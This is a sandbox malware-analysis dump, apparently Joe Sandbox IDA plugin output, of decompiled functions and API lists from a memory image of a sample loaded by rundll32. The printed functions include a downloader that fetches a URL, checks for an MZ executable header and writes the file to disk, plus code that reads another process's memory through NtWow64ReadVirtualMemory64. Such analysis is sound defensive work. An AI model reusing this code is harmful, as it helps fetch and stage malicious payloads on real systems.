                                                            0x04654131
                                                            0x04654131
                                                            0x04654135
                                                            0x0465413b
                                                            0x04654142
                                                            0x04654149
                                                            0x04654155
                                                            0x046541bb
                                                            0x046541c8
                                                            0x046541cc
                                                            0x046541d7
                                                            0x046541dd
                                                            0x046541e0
                                                            0x04654253
                                                            0x00000000
                                                            0x046541e2
                                                            0x046541e2
                                                            0x046541e5
                                                            0x046541f8
                                                            0x046541fe
                                                            0x04654200
                                                            0x00000000
                                                            0x04654206
                                                            0x04654214
                                                            0x0465421a
                                                            0x0465421c
                                                            0x00000000
                                                            0x0465421e
                                                            0x04654222
                                                            0x04654229
                                                            0x0465422e
                                                            0x04654231
                                                            0x04654241
                                                            0x04654247
                                                            0x0465424e
                                                            0x00000000
                                                            0x04654233
                                                            0x04654238
                                                            0x0465423d
                                                            0x0465423d
                                                            0x04654231
                                                            0x00000000
                                                            0x0465421c
                                                            0x04654200
                                                            0x04654157
                                                            0x04654157
                                                            0x0465415a
                                                            0x0465416d
                                                            0x04654175
                                                            0x046542b4
                                                            0x046542b9
                                                            0x046542be
                                                            0x046542c3
                                                            0x046542c8
                                                            0x046542c9
                                                            0x046542ca
                                                            0x046542cb
                                                            0x046542cc
                                                            0x046542cd
                                                            0x046542ce
                                                            0x046542cf
                                                            0x046542d1
                                                            0x046542d6
                                                            0x046542dd
                                                            0x046542e0
                                                            0x046542e3
                                                            0x046542e9
                                                            0x046542ec
                                                            0x046542f4
                                                            0x046542fa
                                                            0x04654303
                                                            0x04654309
                                                            0x04654314
                                                            0x0465417b
                                                            0x04654191
                                                            0x046541b0
                                                            0x046541b0
                                                            0x04654193
                                                            0x046541a3
                                                            0x046541a8
                                                            0x04654259
                                                            0x04654259
                                                            0x0465425e
                                                            0x0465425e
                                                            0x04654263
                                                            0x04654275
                                                            0x04654281
                                                            0x04654288
                                                            0x04654291
                                                            0x04654291
                                                            0x04654288
                                                            0x04654298
                                                            0x046542b1
                                                            0x046542b1
                                                            0x04654175

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 046540E6
                                                            • RtlEnterCriticalSection.NTDLL(00000054), ref: 04654135
                                                            • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 0465416D
                                                            • CreateIoCompletionPort.KERNEL32(?,?,00000000,00000000), ref: 04654189
                                                            • GetLastError.KERNEL32 ref: 046541B0
                                                              • Part of subcall function 04637AC0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 04637ADE
                                                              • Part of subcall function 04637AC0: RtlEnterCriticalSection.NTDLL(?), ref: 0464FA53
                                                              • Part of subcall function 04637AC0: RtlLeaveCriticalSection.NTDLL(?), ref: 0464FA7B
                                                              • Part of subcall function 04637AC0: SetLastError.KERNEL32(0000139F,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 0464FA87
                                                            • HeapFree.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04654291
                                                            • RtlLeaveCriticalSection.NTDLL(00000054), ref: 04654298
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterErrorHeapLastLeave$AllocateCompletionCreateExceptionFreePortRaiseioctlsocket
                                                            • String ID:
                                                            • API String ID: 421389320-0
                                                            • Opcode ID: 0eca43ede923c301dbaaefb1f5184153f29a43537a249420d810a8911f32d341
                                                            • Instruction ID: 0fc50af96303e15cbea70d29c4ce6ce505caefa43dfef27601ab1964ee6ed225
                                                            • Opcode Fuzzy Hash: 0eca43ede923c301dbaaefb1f5184153f29a43537a249420d810a8911f32d341
                                                            • Instruction Fuzzy Hash: 95713C71A00209EFDB14DFA5D884BAEBBB9FF48304F104159E915E7260EF71A990DF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 36%
                                                            			E04635DA0(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v16;
                                                            				char _v32;
                                                            				intOrPtr _v72;
                                                            				intOrPtr _v76;
                                                            				char _v84;
                                                            				intOrPtr _v976;
                                                            				intOrPtr _v980;
                                                            				signed int _v988;
                                                            				char _v1100;
                                                            				intOrPtr _v1968;
                                                            				intOrPtr _v1972;
                                                            				char _v2004;
                                                            				intOrPtr _v2008;
                                                            				char _v2012;
                                                            				intOrPtr _v2016;
                                                            				signed int _t58;
                                                            				struct HINSTANCE__* _t60;
                                                            				struct HINSTANCE__* _t62;
                                                            				signed int _t83;
                                                            				intOrPtr* _t107;
                                                            				intOrPtr _t127;
                                                            				intOrPtr* _t129;
                                                            				intOrPtr* _t131;
                                                            				intOrPtr _t132;
                                                            				void* _t133;
                                                            				signed int _t134;
                                                            				intOrPtr _t154;
                                                            
                                                            				_t58 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t58 ^ _t134;
                                                            				_v2016 = __edx;
                                                            				_t129 = __ecx;
                                                            				_t60 = GetModuleHandleA("ntdll.dll");
                                                            				if(_t60 != 0) {
                                                            					L3:
                                                            					_t131 = GetProcAddress(_t60, "NtWow64QueryInformationProcess64");
                                                            				} else {
                                                            					_t60 = LoadLibraryA("ntdll.dll");
                                                            					if(_t60 != 0) {
                                                            						goto L3;
                                                            					} else {
                                                            						_t131 = 0;
                                                            					}
                                                            				}
                                                            				_t62 = GetModuleHandleA("ntdll.dll");
                                                            				if(_t62 != 0) {
                                                            					L7:
                                                            					_t107 = GetProcAddress(_t62, "NtWow64ReadVirtualMemory64");
                                                            				} else {
                                                            					_t62 = LoadLibraryA("ntdll.dll");
                                                            					if(_t62 != 0) {
                                                            						goto L7;
                                                            					} else {
                                                            						_t107 = 0;
                                                            					}
                                                            				}
                                                            				if(_t131 == 0 || _t107 == 0) {
                                                            					 *((intOrPtr*)(_t129 + 0x14)) = 7;
                                                            					 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                                            					 *_t129 = 0;
                                                            					E046332A0(_t129, 0x467c5d0);
                                                            					__eflags = _v8 ^ _t134;
                                                            					return E04655AFE(_v8 ^ _t134, 0);
                                                            				} else {
                                                            					E0465DEA0(_t129,  &_v84, 0, 0x30);
                                                            					asm("xorps xmm0, xmm0");
                                                            					asm("movlpd [ebp-0x7d8], xmm0");
                                                            					_push( &_v2012);
                                                            					_push(0x30);
                                                            					_push( &_v84);
                                                            					_push(0);
                                                            					_push(_v2016);
                                                            					if( *_t131() < 0 || _v2012 != 0x30 || _v2008 != 0) {
                                                            						L24:
                                                            						E046331B0(_t129, _t129, 0x467c5d0);
                                                            						__eflags = _v8 ^ _t134;
                                                            						return E04655AFE(_v8 ^ _t134);
                                                            					} else {
                                                            						_t132 = _v2016;
                                                            						_push( &_v2012);
                                                            						_push(0);
                                                            						_push(0x388);
                                                            						_push( &_v2004);
                                                            						_push(_v72);
                                                            						_push(_v76);
                                                            						_push(_t132);
                                                            						if( *_t107() < 0 || _v2012 != 0x388 || _v2008 != 0) {
                                                            							goto L24;
                                                            						} else {
                                                            							_push( &_v2012);
                                                            							_push(0);
                                                            							_push(0x3f8);
                                                            							_push( &_v1100);
                                                            							_push(_v1968);
                                                            							_push(_v1972);
                                                            							_push(_t132);
                                                            							if( *_t107() < 0 || _v2012 != 0x3f8) {
                                                            								goto L24;
                                                            							} else {
                                                            								_t154 = _v2008;
                                                            								if(_t154 != 0) {
                                                            									goto L24;
                                                            								} else {
                                                            									_t83 = (_v988 & 0x0000ffff) + 1;
                                                            									_t133 = L04655B55( ~(_t154 > 0) | _t83 * 0x00000002, _t132, _t154);
                                                            									E0465DEA0(_t129, _t133, 0, 2 + (_v988 & 0x0000ffff) * 2);
                                                            									asm("cdq");
                                                            									 *_t107(_v2016, _v980, _v976, _t133, _v988 & 0x0000ffff, _t83 * 2 >> 0x20,  &_v2012,  ~(_t154 > 0) | _t83 * 0x00000002);
                                                            									E046331B0( &_v32, _t129, _t133);
                                                            									L04655B0F(_t133);
                                                            									 *((intOrPtr*)(_t129 + 0x14)) = 7;
                                                            									 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                                            									 *_t129 = 0;
                                                            									_t127 = _v12;
                                                            									if(_t127 >= 8) {
                                                            										 *_t129 = _v32;
                                                            										_v32 = 0;
                                                            									} else {
                                                            										_t101 = _v16 + 1;
                                                            										if(_v16 + 1 != 0) {
                                                            											E0465D060(_t129,  &_v32, _t101 + _t101);
                                                            											_t127 = _v12;
                                                            										}
                                                            									}
                                                            									 *((intOrPtr*)(_t129 + 0x10)) = _v16;
                                                            									 *((intOrPtr*)(_t129 + 0x14)) = _t127;
                                                            									_v12 = 7;
                                                            									_v16 = 0;
                                                            									_v32 = 0;
                                                            									E04633170( &_v32);
                                                            									return E04655AFE(_v8 ^ _t134);
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}
































                                                            0x04635da9
                                                            0x04635db0
                                                            0x04635dbb
                                                            0x04635dc1
                                                            0x04635dc3
                                                            0x04635dd1
                                                            0x04635de2
                                                            0x04635dee
                                                            0x04635dd3
                                                            0x04635dd8
                                                            0x04635ddc
                                                            0x00000000
                                                            0x04635dde
                                                            0x04635dde
                                                            0x04635dde
                                                            0x04635ddc
                                                            0x04635df5
                                                            0x04635dfd
                                                            0x04635e0e
                                                            0x04635e1a
                                                            0x04635dff
                                                            0x04635e04
                                                            0x04635e08
                                                            0x00000000
                                                            0x04635e0a
                                                            0x04635e0a
                                                            0x04635e0a
                                                            0x04635e08
                                                            0x04635e1e
                                                            0x04636021
                                                            0x04636029
                                                            0x04636037
                                                            0x0463603a
                                                            0x04636046
                                                            0x04636051
                                                            0x04635e2c
                                                            0x04635e34
                                                            0x04635e42
                                                            0x04635e45
                                                            0x04635e4d
                                                            0x04635e4e
                                                            0x04635e53
                                                            0x04635e54
                                                            0x04635e56
                                                            0x04635e60
                                                            0x04636000
                                                            0x04636007
                                                            0x04636014
                                                            0x0463601e
                                                            0x04635e80
                                                            0x04635e80
                                                            0x04635e8c
                                                            0x04635e8d
                                                            0x04635e8f
                                                            0x04635e9a
                                                            0x04635e9b
                                                            0x04635e9e
                                                            0x04635ea1
                                                            0x04635ea6
                                                            0x00000000
                                                            0x04635ec9
                                                            0x04635ecf
                                                            0x04635ed0
                                                            0x04635ed2
                                                            0x04635edd
                                                            0x04635ede
                                                            0x04635ee4
                                                            0x04635eea
                                                            0x04635eef
                                                            0x00000000
                                                            0x04635f05
                                                            0x04635f05
                                                            0x04635f0c
                                                            0x00000000
                                                            0x04635f12
                                                            0x04635f1b
                                                            0x04635f30
                                                            0x04635f44
                                                            0x04635f5a
                                                            0x04635f70
                                                            0x04635f76
                                                            0x04635f7c
                                                            0x04635f83
                                                            0x04635f8a
                                                            0x04635f94
                                                            0x04635f97
                                                            0x04635f9d
                                                            0x04635fbf
                                                            0x04635fc1
                                                            0x04635f9f
                                                            0x04635fa2
                                                            0x04635fa5
                                                            0x04635faf
                                                            0x04635fb4
                                                            0x04635fb7
                                                            0x04635fa5
                                                            0x04635fcd
                                                            0x04635fd3
                                                            0x04635fd6
                                                            0x04635fdd
                                                            0x04635fe4
                                                            0x04635fe8
                                                            0x04635fff
                                                            0x04635fff
                                                            0x04635f0c
                                                            0x04635eef
                                                            0x04635ea6
                                                            0x04635e60

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04635DC3
                                                            • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04635DD8
                                                            • GetProcAddress.KERNEL32(00000000,NtWow64QueryInformationProcess64), ref: 04635DE8
                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04635DF5
                                                            • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04635E04
                                                            • GetProcAddress.KERNEL32(00000000,NtWow64ReadVirtualMemory64), ref: 04635E14
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                            • String ID: 0$NtWow64QueryInformationProcess64$NtWow64ReadVirtualMemory64$ntdll.dll
                                                            • API String ID: 310444273-3583746680
                                                            • Opcode ID: 044b83255e56ab32826ba3cb4c52e3725616e84b02416b1761f35afa97d3ab1a
                                                            • Instruction ID: 449cc427c2db81297be0342c84474cdcb8c2e418602546350a07ce259949311f
                                                            • Opcode Fuzzy Hash: 044b83255e56ab32826ba3cb4c52e3725616e84b02416b1761f35afa97d3ab1a
                                                            • Instruction Fuzzy Hash: B0618971E00359ABDB619F64DC45BAEB7B8EF44305F4000AAE909E6240FB78BE44CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 93%
                                                            			E04645750(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				void _v1032;
                                                            				char _v1033;
                                                            				long _v1040;
                                                            				WCHAR* _v1044;
                                                            				long _v1048;
                                                            				void* _v1052;
                                                            				signed int _t21;
                                                            				void* _t45;
                                                            				void* _t53;
                                                            				void* _t54;
                                                            				struct _OVERLAPPED* _t56;
                                                            				signed int _t58;
                                                            				void* _t59;
                                                            
                                                            				_t21 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t21 ^ _t58;
                                                            				_v1044 = __edx;
                                                            				_v1040 = 0;
                                                            				_t56 = 1;
                                                            				_v1048 = 0;
                                                            				_v1033 = 1;
                                                            				_t53 = InternetOpenW(L"Mozilla/4.0 (compatible)", 0, 0, 0, 0);
                                                            				_v1052 = _t53;
                                                            				if(_t53 == 0) {
                                                            					L3:
                                                            					return E04655AFE(_v8 ^ _t58);
                                                            				} else {
                                                            					_t45 = InternetOpenUrlW(_t53, __ecx, 0, 0, 0x80000000, 0);
                                                            					if(_t45 != 0) {
                                                            						_t54 = CreateFileW(_v1044, 0x40000000, 0, 0, 2, 0, 0);
                                                            						if(_t54 != 0xffffffff) {
                                                            							while(1) {
                                                            								E0465DEA0(_t54,  &_v1032, 0, 0x400);
                                                            								_t59 = _t59 + 0xc;
                                                            								InternetReadFile(_t45,  &_v1032, 0x400,  &_v1040);
                                                            								if(_t56 != 0 && _v1032 != 0x5a4d) {
                                                            									break;
                                                            								}
                                                            								_t56 = 0;
                                                            								WriteFile(_t54,  &_v1032, _v1040,  &_v1048, 0);
                                                            								if(_v1040 > 0) {
                                                            									continue;
                                                            								} else {
                                                            								}
                                                            								L10:
                                                            								CloseHandle(_t54);
                                                            								goto L11;
                                                            							}
                                                            							_v1033 = 0;
                                                            							goto L10;
                                                            						}
                                                            						L11:
                                                            						InternetCloseHandle(_t45);
                                                            						InternetCloseHandle(_v1052);
                                                            						return E04655AFE(_v8 ^ _t58);
                                                            					} else {
                                                            						InternetCloseHandle(_t53);
                                                            						goto L3;
                                                            					}
                                                            				}
                                                            			}

















                                                            0x04645759
                                                            0x04645760
                                                            0x04645773
                                                            0x0464577b
                                                            0x04645785
                                                            0x0464578a
                                                            0x04645794
                                                            0x046457a1
                                                            0x046457a3
                                                            0x046457ab
                                                            0x046457cf
                                                            0x046457df
                                                            0x046457ad
                                                            0x046457c0
                                                            0x046457c4
                                                            0x046457fb
                                                            0x04645800
                                                            0x04645802
                                                            0x04645810
                                                            0x04645815
                                                            0x0464582c
                                                            0x04645834
                                                            0x00000000
                                                            0x00000000
                                                            0x04645844
                                                            0x0464585c
                                                            0x04645868
                                                            0x00000000
                                                            0x00000000
                                                            0x0464586a
                                                            0x04645873
                                                            0x04645874
                                                            0x00000000
                                                            0x04645874
                                                            0x0464586c
                                                            0x00000000
                                                            0x0464586c
                                                            0x0464587a
                                                            0x04645881
                                                            0x04645889
                                                            0x046458a1
                                                            0x046457c6
                                                            0x046457c7
                                                            0x00000000
                                                            0x046457c7
                                                            0x046457c4

                                                            APIs
                                                            • InternetOpenW.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 0464579B
                                                            • InternetOpenUrlW.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 046457BA
                                                            • InternetCloseHandle.WININET(00000000), ref: 046457C7
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 046457F5
                                                            • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 0464582C
                                                            • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0464585C
                                                            • CloseHandle.KERNEL32(00000000), ref: 04645874
                                                            • InternetCloseHandle.WININET(00000000), ref: 04645881
                                                            • InternetCloseHandle.WININET(?), ref: 04645889
                                                            Strings
                                                            • Mozilla/4.0 (compatible), xrefs: 0464576E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$CloseHandle$File$Open$CreateReadWrite
                                                            • String ID: Mozilla/4.0 (compatible)
                                                            • API String ID: 769820311-4055971283
                                                            • Opcode ID: 71bd387b3cd2245ea283c9a6054370097ba22fcb509cd915e3f517ad8f5f7fe4
                                                            • Instruction ID: 9b977cf094de733101171050f99923716c33e4079da4927d30fb5b9cc41a46fd
                                                            • Opcode Fuzzy Hash: 71bd387b3cd2245ea283c9a6054370097ba22fcb509cd915e3f517ad8f5f7fe4
                                                            • Instruction Fuzzy Hash: 3331ABB1A00218BBEB309B549C49FAEB778DB44B14F1041E5F709B61C1FB746D858F99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 54%
                                                            			E04636530() {
                                                            				struct HINSTANCE__* _t1;
                                                            				_Unknown_base(*)()* _t2;
                                                            				struct HINSTANCE__* _t3;
                                                            				_Unknown_base(*)()* _t6;
                                                            				struct HINSTANCE__* _t15;
                                                            
                                                            				_t1 = LoadLibraryA("User32.dll");
                                                            				_t15 = _t1;
                                                            				if(_t15 != 0) {
                                                            					_t2 = GetProcAddress(_t15, "SetProcessDpiAwarenessContext");
                                                            					if(_t2 == 0) {
                                                            						L4:
                                                            						_t3 = LoadLibraryA("Shcore.dll");
                                                            						if(_t3 == 0) {
                                                            							L8:
                                                            							if(GetProcAddress(_t15, "SetProcessDPIAware") != 0) {
                                                            								goto __eax;
                                                            							}
                                                            							return 0;
                                                            						} else {
                                                            							_t6 = GetProcAddress(_t3, "SetProcessDpiAwareness");
                                                            							if(_t6 == 0) {
                                                            								goto L8;
                                                            							} else {
                                                            								_push(2);
                                                            								if( *_t6() == 0) {
                                                            									goto L8;
                                                            								} else {
                                                            									goto L7;
                                                            								}
                                                            							}
                                                            						}
                                                            					} else {
                                                            						_push(0xfffffffd);
                                                            						if( *_t2() != 0) {
                                                            							L7:
                                                            							return 1;
                                                            						} else {
                                                            							goto L4;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					return _t1;
                                                            				}
                                                            			}








                                                            0x04636536
                                                            0x0463653c
                                                            0x04636540
                                                            0x04636551
                                                            0x04636555
                                                            0x0463655f
                                                            0x04636564
                                                            0x0463656c
                                                            0x0463658a
                                                            0x04636594
                                                            0x04636598
                                                            0x04636598
                                                            0x0463659e
                                                            0x0463656e
                                                            0x04636574
                                                            0x04636578
                                                            0x00000000
                                                            0x0463657a
                                                            0x0463657a
                                                            0x04636580
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04636580
                                                            0x04636578
                                                            0x04636557
                                                            0x04636557
                                                            0x0463655d
                                                            0x04636582
                                                            0x04636589
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463655d
                                                            0x04636543
                                                            0x04636543
                                                            0x04636543

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(User32.dll,?,046365E3), ref: 04636536
                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwarenessContext), ref: 04636551
                                                            • LoadLibraryA.KERNEL32(Shcore.dll,?,?,046365E3), ref: 04636564
                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 04636574
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: SetProcessDPIAware$SetProcessDpiAwareness$SetProcessDpiAwarenessContext$Shcore.dll$User32.dll
                                                            • API String ID: 2574300362-2252252969
                                                            • Opcode ID: 629c23b8c2f4d7566d58f033024548b7d5d8ec4c00975bf53fdba612a9b3ad8f
                                                            • Instruction ID: 98472c043b25dcc65f85b477633ffb1791c46de7d2c532c55cd3fdf28cdfce9b
                                                            • Opcode Fuzzy Hash: 629c23b8c2f4d7566d58f033024548b7d5d8ec4c00975bf53fdba612a9b3ad8f
                                                            • Instruction Fuzzy Hash: E8F03632349353769B31657EFC09E9A27486FF0A767050631F415D5198FE84EE4248B5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 96%
                                                            			E04651DE0(intOrPtr __ecx) {
                                                            				intOrPtr _v8;
                                                            				long _v12;
                                                            				intOrPtr _v16;
                                                            				void* __esi;
                                                            				void* _t44;
                                                            				long _t45;
                                                            				short* _t51;
                                                            				void* _t54;
                                                            				signed int _t57;
                                                            				intOrPtr _t63;
                                                            				intOrPtr _t69;
                                                            				signed int _t70;
                                                            				signed int _t71;
                                                            				intOrPtr _t80;
                                                            				signed int _t82;
                                                            				struct _CRITICAL_SECTION* _t93;
                                                            
                                                            				_t63 = __ecx;
                                                            				_v16 = __ecx;
                                                            				if( *((intOrPtr*)(__ecx + 0x24)) != 0) {
                                                            					_t93 = __ecx + 0x28;
                                                            					EnterCriticalSection(_t93);
                                                            					__eflags =  *(_t63 + 0x24);
                                                            					if( *(_t63 + 0x24) != 0) {
                                                            						_t82 = timeGetTime();
                                                            						_v12 = _t82;
                                                            						_v8 =  *((intOrPtr*)(_t63 + 0x18));
                                                            						__eflags = _t82;
                                                            						if(_t82 == 0) {
                                                            							_v12 = timeGetTime();
                                                            						}
                                                            						_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t63 + 4)))) + 0x54))();
                                                            						__eflags = _v12 - _v8 - _t44;
                                                            						if(_v12 - _v8 <= _t44) {
                                                            							_t69 =  *((intOrPtr*)(_t63 + 0x10));
                                                            							_t45 = _t82;
                                                            							_v8 = _t69;
                                                            							__eflags = _t82;
                                                            							if(_t82 == 0) {
                                                            								_t45 = timeGetTime();
                                                            								_t69 = _v8;
                                                            							}
                                                            							__eflags = _t45 - _t69;
                                                            							if(_t45 - _t69 >= 0) {
                                                            								_t80 =  *((intOrPtr*)(_t63 + 0x40));
                                                            								 *(_t63 + 0x14) =  *(_t63 + 0x14) + 1;
                                                            								_t70 =  *(_t63 + 0x14);
                                                            								__eflags =  *(_t80 + 0x50) * _t70 - 0x7d0;
                                                            								if(__eflags >= 0) {
                                                            									_t71 = 0x7d0;
                                                            								} else {
                                                            									_t21 = _t70 + 1; // 0x1
                                                            									_t57 = _t21;
                                                            									 *(_t63 + 0x14) = _t57;
                                                            									_t71 =  *(_t80 + 0x50) * _t57;
                                                            								}
                                                            								 *((intOrPtr*)(_t63 + 0x10)) = _t71 + _t82;
                                                            								_push(0xc);
                                                            								_v8 =  *((intOrPtr*)(_t63 + 0x20));
                                                            								_t51 = L04655B55(_t71, _t93, __eflags);
                                                            								_v12 = _t51;
                                                            								__eflags =  *(_t63 + 0x24) - 2;
                                                            								 *_t51 = 0xbb4f;
                                                            								 *((char*)(_t51 + 3)) = 0xbb00 |  *(_t63 + 0x24) == 0x00000002;
                                                            								 *((char*)(_t51 + 2)) = 1;
                                                            								 *((intOrPtr*)(_t51 + 4)) =  *((intOrPtr*)(_t63 + 0x1c));
                                                            								 *((intOrPtr*)(_t51 + 8)) = _v8;
                                                            								LeaveCriticalSection(_t93);
                                                            								asm("sbb ecx, ecx");
                                                            								__eflags =  ~( *(_v16 + 8)) &  *(_v16 + 8) + 0x00000004;
                                                            								_t54 = E0464E940( ~( *(_v16 + 8)) &  *(_v16 + 8) + 0x00000004, _v12, 0xc, 0);
                                                            								L04655B0F(_v12);
                                                            								return _t54;
                                                            							} else {
                                                            								LeaveCriticalSection(_t93);
                                                            								return 1;
                                                            							}
                                                            						} else {
                                                            							SetLastError(0x5b4);
                                                            							__eflags = 0;
                                                            							LeaveCriticalSection(_t93);
                                                            							return 0;
                                                            						}
                                                            					} else {
                                                            						SetLastError(0x139f);
                                                            						__eflags = 0;
                                                            						LeaveCriticalSection(_t93);
                                                            						return 0;
                                                            					}
                                                            				} else {
                                                            					SetLastError(0x139f);
                                                            					return 0;
                                                            				}
                                                            			}



















                                                            0x04651de7
                                                            0x04651de9
                                                            0x04651df0
                                                            0x04651e06
                                                            0x04651e0a
                                                            0x04651e10
                                                            0x04651e14
                                                            0x04651e39
                                                            0x04651e3e
                                                            0x04651e41
                                                            0x04651e44
                                                            0x04651e46
                                                            0x04651e4e
                                                            0x04651e4e
                                                            0x04651e56
                                                            0x04651e5f
                                                            0x04651e61
                                                            0x04651e80
                                                            0x04651e83
                                                            0x04651e85
                                                            0x04651e88
                                                            0x04651e8a
                                                            0x04651e8c
                                                            0x04651e92
                                                            0x04651e92
                                                            0x04651e95
                                                            0x04651e97
                                                            0x04651eae
                                                            0x04651eb1
                                                            0x04651eb4
                                                            0x04651ebd
                                                            0x04651ec2
                                                            0x04651ed2
                                                            0x04651ec4
                                                            0x04651ec4
                                                            0x04651ec4
                                                            0x04651ec7
                                                            0x04651ecd
                                                            0x04651ecd
                                                            0x04651edd
                                                            0x04651ee6
                                                            0x04651ee8
                                                            0x04651eeb
                                                            0x04651ef3
                                                            0x04651efb
                                                            0x04651efe
                                                            0x04651f04
                                                            0x04651f0b
                                                            0x04651f0f
                                                            0x04651f12
                                                            0x04651f15
                                                            0x04651f2e
                                                            0x04651f30
                                                            0x04651f32
                                                            0x04651f3a
                                                            0x04651f4a
                                                            0x04651e99
                                                            0x04651e9f
                                                            0x04651ead
                                                            0x04651ead
                                                            0x04651e63
                                                            0x04651e68
                                                            0x04651e6f
                                                            0x04651e71
                                                            0x04651e7f
                                                            0x04651e7f
                                                            0x04651e16
                                                            0x04651e1b
                                                            0x04651e22
                                                            0x04651e24
                                                            0x04651e32
                                                            0x04651e32
                                                            0x04651df2
                                                            0x04651df7
                                                            0x04651e03
                                                            0x04651e03

                                                            APIs
                                                            • SetLastError.KERNEL32(0000139F), ref: 04651DF7
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04651E0A
                                                            • SetLastError.KERNEL32(0000139F), ref: 04651E1B
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04651E24
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 2124651672-0
                                                            • Opcode ID: c6c940918f050573eedad1bd29eab23298cb7b07a53c5ec7797b7937ab806c75
                                                            • Instruction ID: 10cabc136924b9ee9feb0b5ea04cf445ff9d3ab94166fc4d71c041f9e00939ca
                                                            • Opcode Fuzzy Hash: c6c940918f050573eedad1bd29eab23298cb7b07a53c5ec7797b7937ab806c75
                                                            • Instruction Fuzzy Hash: C1416176A00204DFCB08DFA9D588A99BBB9FF89311F1541A9DD09DB341EB35E901CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 54%
                                                            			E0463DF10(intOrPtr __ecx, intOrPtr _a4, void* _a8) {
                                                            				intOrPtr _v8;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr _t21;
                                                            				void* _t22;
                                                            				int _t27;
                                                            				int _t34;
                                                            				intOrPtr _t39;
                                                            				void* _t41;
                                                            				void* _t43;
                                                            				void* _t48;
                                                            				void* _t52;
                                                            				void* _t58;
                                                            				void* _t66;
                                                            				void* _t67;
                                                            				void* _t70;
                                                            				void* _t74;
                                                            				intOrPtr* _t78;
                                                            				void* _t79;
                                                            
                                                            				_push(__ecx);
                                                            				_push(_t67);
                                                            				_t58 = _a8;
                                                            				_t39 = __ecx;
                                                            				_v8 = __ecx;
